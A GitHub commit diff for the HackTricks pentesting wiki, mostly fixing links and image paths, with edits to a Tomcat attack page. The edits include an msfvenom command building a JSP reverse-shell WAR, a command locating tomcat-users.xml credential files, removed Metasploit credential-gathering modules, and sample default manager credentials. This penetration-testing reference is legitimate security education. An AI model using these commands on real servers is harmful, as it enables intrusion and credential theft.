Skip to content

Commit

Permalink
GITBOOK-4443: No subject
Browse files Browse the repository at this point in the history
  • Loading branch information
carlospolop authored and gitbook-bot committed Dec 12, 2024
1 parent 6d6e39e commit b3ead69
Show file tree
Hide file tree
Showing 6 changed files with 48 additions and 477 deletions.
3 changes: 1 addition & 2 deletions SUMMARY.md
Original file line number Diff line number Diff line change
Expand Up @@ -430,8 +430,7 @@
* [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md)
* [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md)
* [Symfony](network-services-pentesting/pentesting-web/symphony.md)
* [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md)
* [Basic Tomcat Info](network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md)
* [Tomcat](network-services-pentesting/pentesting-web/tomcat.md)
* [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
* [VMWare (ESX, VCenter...)](network-services-pentesting/pentesting-web/vmware-esx-vcenter....md)
* [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md)
Expand Down
18 changes: 9 additions & 9 deletions network-services-pentesting/pentesting-web/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -9,13 +9,13 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" d
<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>

**Get a hacker's perspective on your web apps, network, and cloud**

Expand Down Expand Up @@ -104,7 +104,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
* [**H2 - Java SQL database**](h2-java-sql-database.md)
* [**IIS tricks**](iis-internet-information-services.md)
* [**JBOSS**](jboss.md)
* [**Jenkins**]([https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/broken-reference/README.md](https://github.com/HackTricks-wiki/hacktricks-cloud/tree/master/pentesting-ci-cd/jenkins-security))
* [**Jenkins**](\[https:/github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/broken-reference/README.md]\(https:/github.com/HackTricks-wiki/hacktricks-cloud/tree/master/pentesting-ci-cd/jenkins-security\)/)
* [**Jira**](jira.md)
* [**Joomla**](joomla.md)
* [**JSP**](jsp.md)
Expand All @@ -115,7 +115,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
* [**Python**](python.md)
* [**Spring Actuators**](spring-actuators.md)
* [**Symphony**](symphony.md)
* [**Tomcat**](tomcat/)
* [**Tomcat**](tomcat.md)
* [**VMWare**](vmware-esx-vcenter....md)
* [**Web API Pentesting**](web-api-pentesting.md)
* [**WebDav**](put-method-webdav.md)
Expand Down Expand Up @@ -161,7 +161,7 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi

If a CMS is used don't forget to **run a scanner**, maybe something juicy is found:

[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\
Expand Down Expand Up @@ -278,7 +278,7 @@ Tools:

**Recommended dictionaries:**

* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt)
* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt)
* [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)
* [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
* [Assetnote wordlists](https://wordlists.assetnote.io)
Expand Down Expand Up @@ -362,14 +362,14 @@ Now that a comprehensive enumeration of the web application has been performed i
Find more info about web vulns in:

* [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
* [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html)
* [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html)
* [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)

### Monitor Pages for changes

You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.

<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>

**Get a hacker's perspective on your web apps, network, and cloud**

Expand Down Expand Up @@ -458,7 +458,7 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" d
<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Expand Down
43 changes: 29 additions & 14 deletions network-services-pentesting/pentesting-web/tomcat.md
Original file line number Diff line number Diff line change
@@ -1,15 +1,15 @@
# Tomcat

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Expand All @@ -20,7 +20,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
* It usually runs on **port 8080**
* **Common Tomcat error:**

<figure><img src="../../.gitbook/assets/image (1) (6).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (150).png" alt=""><figcaption></figcaption></figure>

## Enumeration

Expand Down Expand Up @@ -156,7 +156,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
1. Create the war to deploy:

```bash
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
```

2. Upload the `revshell.war` file and access to it (`/revshell/`):
Expand Down Expand Up @@ -239,17 +239,32 @@ zip -r backup.war cmd.jsp

## POST

Name of Tomcat credentials file is _tomcat-users.xml_
Name of Tomcat credentials file is `tomcat-users.xml` and this file indicates the role of the user inside tomcat.

```bash
find / -name tomcat-users.xml 2>/dev/null
```

Other ways to gather Tomcat credentials:

```bash
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
Example:

```xml
[...]
<!--
By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary.
Built-in Tomcat manager roles:
- manager-gui - allows access to the HTML GUI and the status pages
- manager-script - allows access to the HTTP API and the status pages
- manager-jmx - allows access to the JMX proxy and the status pages
- manager-status - allows access to the status pages only
-->
[...]
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" />
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" />
```

## Other tomcat scanning tools
Expand All @@ -262,15 +277,15 @@ msf> use post/windows/gather/enum_tomcat
* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Expand Down
Loading

0 comments on commit b3ead69

Please sign in to comment.